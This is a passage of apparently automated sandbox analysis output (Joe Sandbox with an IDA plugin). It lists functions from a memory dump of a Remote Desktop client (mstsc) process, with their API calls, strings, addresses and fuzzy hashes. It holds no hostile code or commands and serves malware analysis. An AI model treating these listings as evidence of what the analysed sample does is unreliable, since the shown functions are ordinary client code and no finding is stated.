                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000), ref: 009348D3
                                                                                                                                                                                    • GetDlgItem.USER32(00000005,00906780), ref: 00934913
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00934916
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0093493B
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0093493E
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0093494D
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00934950
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0093496F
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000032FF), ref: 009349A0
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009349B6
                                                                                                                                                                                    • CreateDialogIndirectParamW.USER32(?,00000000,00000000,00961E40,?), ref: 009349FA
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00934A09
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000032FA), ref: 00934A1D
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00934A2E
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00934A43
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000032FA), ref: 00934A51
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,00000141,000000FF,00000000), ref: 00922B0E
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,00000144,00000000,00000000), ref: 00922B22
                                                                                                                                                                                      • Part of subcall function 00922AD9: wcsncmp.MSVCRT ref: 00922B40
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 00922B67
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00922BB9
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00922BC8
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,0000040E,00000000,00000001), ref: 00922BD3
                                                                                                                                                                                      • Part of subcall function 00922AD9: SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 00922BDD
                                                                                                                                                                                      • Part of subcall function 009347DA: GetDlgItem.USER32(?,000032FA), ref: 009347EA
                                                                                                                                                                                      • Part of subcall function 009347DA: SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 009347FA
                                                                                                                                                                                      • Part of subcall function 009347DA: #412.COMCTL32(00000000,Function_00034790,00000000), ref: 00934813
                                                                                                                                                                                      • Part of subcall function 009347DA: #410.COMCTL32(00000000,Function_00034790,00000000,00000000), ref: 00934858
                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000000,000032FA,-00000054), ref: 00934A72
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMessageSendWindow$Enable$Show$#410#412??2@CreateDialogIndirectParamRectTextwcsncmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1121832012-0
                                                                                                                                                                                    • Opcode ID: bfc211dbd6d5ef92ac8a850234efc045ca5053cb9f3d02a62b8e2246f6560f9b
                                                                                                                                                                                    • Instruction ID: 5a4223fc88884e8bd5364c5978e01b50666333258b6854c453aa81004af1261e
                                                                                                                                                                                    • Opcode Fuzzy Hash: bfc211dbd6d5ef92ac8a850234efc045ca5053cb9f3d02a62b8e2246f6560f9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8518B71910214AFCF11DFA5DC89EAB7BB9FF48700F054069F905AB265CB75A811DFA0
                                                                                                                                                                                    Function 0090FA31 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 292COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00000000,00000000,00945DAF,00000000,?,00000000,?,0094672F,00000000,00000000,?,00000001,?,00000000,00000000,0096AF68), ref: 0090FAA7
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0090FB8A
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@AddressCommandFreeHandleLibraryLineMessageModuleProcTrace
                                                                                                                                                                                    • String ID: CAtlExeModuleT::PreMessageLoop failed!$CTscRemoteSessionsManager$Embedding$Failed to to intialize remote sessions manager$RegServer$RegisterAppId failed!$RegisterServer failed!$SingleUse$UnregServer$UnregisterAppId failed!$UnregisterServer failed!$m_RemoteSessionLock.Init failed!
                                                                                                                                                                                    • API String ID: 2806423288-809283771
                                                                                                                                                                                    • Opcode ID: a30bcc2dfd068df6d2ccafd8490601c6cdc98f0781db358d5b6e0c4f3d026c41
                                                                                                                                                                                    • Instruction ID: 7776ecf67a1458d96575de5e1ceed337bade153f5fd4ba26939f7551a6dbc635
                                                                                                                                                                                    • Opcode Fuzzy Hash: a30bcc2dfd068df6d2ccafd8490601c6cdc98f0781db358d5b6e0c4f3d026c41
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9A14C31B183556FDB3ADF64D835F653AD5AB85350F0500A8F805ABAF2C7A4CE80AF46
                                                                                                                                                                                    Function 009401CA Relevance: 24.2, APIs: 16, Instructions: 170windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?,?,?,?,00000000), ref: 00940251
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000335E,?,?,?,?,00000000), ref: 00940267
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000335E), ref: 00940271
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000CF,00000001,00000000), ref: 0094028B
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00940296
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 009402A6
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003366), ref: 009402D5
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009402EC
                                                                                                                                                                                    • CreateDialogIndirectParamW.USER32(?,00000000,?,00961E40,?), ref: 0094032A
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00940336
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000335E), ref: 00940344
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00940356
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemWindow$MessageRectText$??2@AddressCreateDialogFreeHandleIndirectInvalidateLibraryModuleParamProcSendShowTrace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2286261651-0
                                                                                                                                                                                    • Opcode ID: 040496d88880aacef31ecf12cf55eabf43c7d74f6b51afb0d69e2d660e7ee16c
                                                                                                                                                                                    • Instruction ID: 4a25e9d484104cee451f95fc0f5f1ed957ab1abd16e50e9b3ac021c1d0c046ba
                                                                                                                                                                                    • Opcode Fuzzy Hash: 040496d88880aacef31ecf12cf55eabf43c7d74f6b51afb0d69e2d660e7ee16c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 12518F71604200EFDF11AFA5DD99E7A7F7AEF89700B148059FD469B266CBB1D800DB60
                                                                                                                                                                                    Function 00916B4E Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 392COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00916B91
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00916B9C
                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00916BAE
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    • SetRect.USER32 ref: 00916BC2
                                                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?,00000001), ref: 00916C2C
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00917015
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • HandleContainerWndDisplayChange, xrefs: 00916E62
                                                                                                                                                                                    • QI for IID_IMsRdpClient9 failed!, xrefs: 00916E2D
                                                                                                                                                                                    • EnterMoveSizeLoop, xrefs: 00916E69
                                                                                                                                                                                    • Failed RegisterPopupParentWindowClass(TRUE), xrefs: 00916BFB
                                                                                                                                                                                    • DynamicDeviceTestEnabled, xrefs: 00916EFE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: RectWindow$CommonControlsCopyDesktopDestroyInitMessageTrace
                                                                                                                                                                                    • String ID: DynamicDeviceTestEnabled$EnterMoveSizeLoop$Failed RegisterPopupParentWindowClass(TRUE)$HandleContainerWndDisplayChange$QI for IID_IMsRdpClient9 failed!
                                                                                                                                                                                    • API String ID: 2476843831-3953550343
                                                                                                                                                                                    • Opcode ID: d3e39d0bda8ebdf0fec8dc0090cc86e183f0cc0dc435b5295c41cb0a7e891929
                                                                                                                                                                                    • Instruction ID: 54797416545bee8b5cb72125d43c7f8a04265f574776bcb65b172e466ffb9846
                                                                                                                                                                                    • Opcode Fuzzy Hash: d3e39d0bda8ebdf0fec8dc0090cc86e183f0cc0dc435b5295c41cb0a7e891929
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76E1BE31B04309AFDB19DF65D899FE9BBAABB48304F044058F5419B2A2CBB1E8D1DF51
                                                                                                                                                                                    Function 009372C9 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400,750A375A,?,?), ref: 009372FA
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000200), ref: 00937396
                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,00906D74), ref: 0093763C
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressErrorFreeHandleLastLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: TCHAR
                                                                                                                                                                                    • API String ID: 3225508460-2426338081
                                                                                                                                                                                    • Opcode ID: d08157ec1494f28061426cf812aa4d212064bb7898ba4b440bbc2bb48e400062
                                                                                                                                                                                    • Instruction ID: 3fa8931bb58380da700227c60052d8756462d5e6cae65bb4d584f3e2138cc95d
                                                                                                                                                                                    • Opcode Fuzzy Hash: d08157ec1494f28061426cf812aa4d212064bb7898ba4b440bbc2bb48e400062
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF91E6B1A0C3086FDB399F94DC5AFA6B7AAAB49304F100098F541A71B2C7B4DD80DF56
                                                                                                                                                                                    Function 00945990 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182libraryloaderprocessCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,00000000,00000000,00000000), ref: 009459A8
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009459B5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00945A1D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00945C84,Wow64RevertWow64FsRedirection), ref: 00945A2C
                                                                                                                                                                                    • memset.MSVCRT ref: 00945A4A
                                                                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 00945A84
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00945A93
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00945AE9
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00945AEE
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00945C84), ref: 00945BA3
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • kernel32.dll, xrefs: 0094599B
                                                                                                                                                                                    • Wow64DisableWow64FsRedirection, xrefs: 00945A17
                                                                                                                                                                                    • Wow64RevertWow64FsRedirection, xrefs: 00945A1F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleLibraryProc$CloseErrorFreeLast$CreateLoadModuleProcessmemset
                                                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                    • API String ID: 3803272689-4169039593
                                                                                                                                                                                    • Opcode ID: 9e9fdf9095cce343fdcb9017e98b28aa1190d7a1a225fb9ee5f6529695f79831
                                                                                                                                                                                    • Instruction ID: b7e12b34c7f317fc2bad05c12b6521bfd5a8e1baab4432e3337d91b7ad694230
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9fdf9095cce343fdcb9017e98b28aa1190d7a1a225fb9ee5f6529695f79831
                                                                                                                                                                                    • Instruction Fuzzy Hash: B351E672A047087FDB259FE4DC89FAA7BA9EB48314F150159F601A71A3C6B1DC80EF51
                                                                                                                                                                                    Function 0093782D Relevance: 22.9, APIs: 15, Instructions: 353windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003313), ref: 00937895
                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0093789C
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000033A6), ref: 009378B6
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00003316), ref: 009378D7
                                                                                                                                                                                      • Part of subcall function 00961C30: GetDlgItem.USER32(?,0096A070), ref: 00961C4E
                                                                                                                                                                                      • Part of subcall function 00961C30: EnableWindow.USER32(00000000), ref: 00961C55
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000110,?,00000110,00000000), ref: 00937BA2
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000331B), ref: 00937BC4
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00937BCB
                                                                                                                                                                                    • CheckDlgButton.USER32(?,000033A6,00000000), ref: 00937C0B
                                                                                                                                                                                    • CheckDlgButton.USER32(?,00003316,00000000), ref: 00937C52
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Button$ItemWindow$CheckCheckedEnable$MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2189916300-0
                                                                                                                                                                                    • Opcode ID: e67916e8476f1852f91d929180a12a6a4261996d26c5ae4a88ab4e3459a4ea94
                                                                                                                                                                                    • Instruction ID: 5c5e11cdd3baa55a91f1a785a10cc039b58dd956fd9f824036527df8a8f7570b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e67916e8476f1852f91d929180a12a6a4261996d26c5ae4a88ab4e3459a4ea94
                                                                                                                                                                                    • Instruction Fuzzy Hash: 33C1BFB1218345AFD725DFA4C889E6AB7A9BF89304F04046CF541DB2A2CB74ED50EF51
                                                                                                                                                                                    Function 0095E335 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 284COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?,?,00000000,?), ref: 0095E3E1
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?), ref: 0095E3EB
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressClientErrorFreeHandleLastLibraryMessageModuleProcRectTrace
                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                    • API String ID: 3483488408-3887548279
                                                                                                                                                                                    • Opcode ID: c3cfc8f90771cc4518a40526c5e9233d93ae1191d8aec2ff88bc8fa6db50a761
                                                                                                                                                                                    • Instruction ID: 541c962ba950b360d87b223a8cb59afc8d65c227ed8573ce6221e2f93e36332b
                                                                                                                                                                                    • Opcode Fuzzy Hash: c3cfc8f90771cc4518a40526c5e9233d93ae1191d8aec2ff88bc8fa6db50a761
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30A1BF72619300AFD729CF69C889F2A7BEABB88391F04095DF98097261C772DD44DF42
                                                                                                                                                                                    Function 00921BB6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 144registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000038), ref: 00921BDC
                                                                                                                                                                                    • LoadCursorW.USER32 ref: 00921C06
                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00921C11
                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00921C2D
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00921C3A
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00921C67
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00921C94
                                                                                                                                                                                    • CreateWindowExW.USER32 ref: 00921CBE
                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00921CCF
                                                                                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 00921D01
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastWindow$AddressClassClientCreateCursorFreeHandleLibraryLoadLongMessageModuleObjectProcRectRegisterShowStockTrace
                                                                                                                                                                                    • String ID: 0$TscShellAxHostClass
                                                                                                                                                                                    • API String ID: 4201582936-2575422651
                                                                                                                                                                                    • Opcode ID: 7ad7b8c285021ee682aa4fb783048a3dd17ae00b260659119b74c22d3b2a6832
                                                                                                                                                                                    • Instruction ID: 39da45a6cb1b7a8afccd89504f115b05f53958d4e66b005bfc343e5cd7ca0070
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ad7b8c285021ee682aa4fb783048a3dd17ae00b260659119b74c22d3b2a6832
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15514871914308AFCB24DFA5EC48FABBBB9EB89310F10445DF546AA2A1C7709854DF64
                                                                                                                                                                                    Function 0093A99B Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 142registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadCursorW.USER32 ref: 0093A9E9
                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0093AA06
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093AA19
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093AA46
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • CreateWindowExW.USER32 ref: 0093AA93
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 0093AAA2
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0093AAAE
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093AAB8
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093AAD6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$Window$AddressClassCreateCursorFreeHandleLibraryLoadLongMessageModuleProcRegisterTrace
                                                                                                                                                                                    • String ID: 0$TscShellContainerClass
                                                                                                                                                                                    • API String ID: 661181555-978173974
                                                                                                                                                                                    • Opcode ID: 828e01c2d2841f48fb61ec83adeef7e32a409d41cdc686100b9310d02786d94b
                                                                                                                                                                                    • Instruction ID: d74872300528820204aec9ca275cad8e1ac32e8101d9ffbaad96948aa3dbd209
                                                                                                                                                                                    • Opcode Fuzzy Hash: 828e01c2d2841f48fb61ec83adeef7e32a409d41cdc686100b9310d02786d94b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51415DB1514304AEDB289F69DC59F6BBBBAEF48300F04415EF581E62A1D7B4D840DF62
                                                                                                                                                                                    Function 022C8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 022C8914
                                                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 022C89FC
                                                                                                                                                                                    • WindowsExcludedProcs, xrefs: 022C87C1
                                                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 022C8827
                                                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 022C87E6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
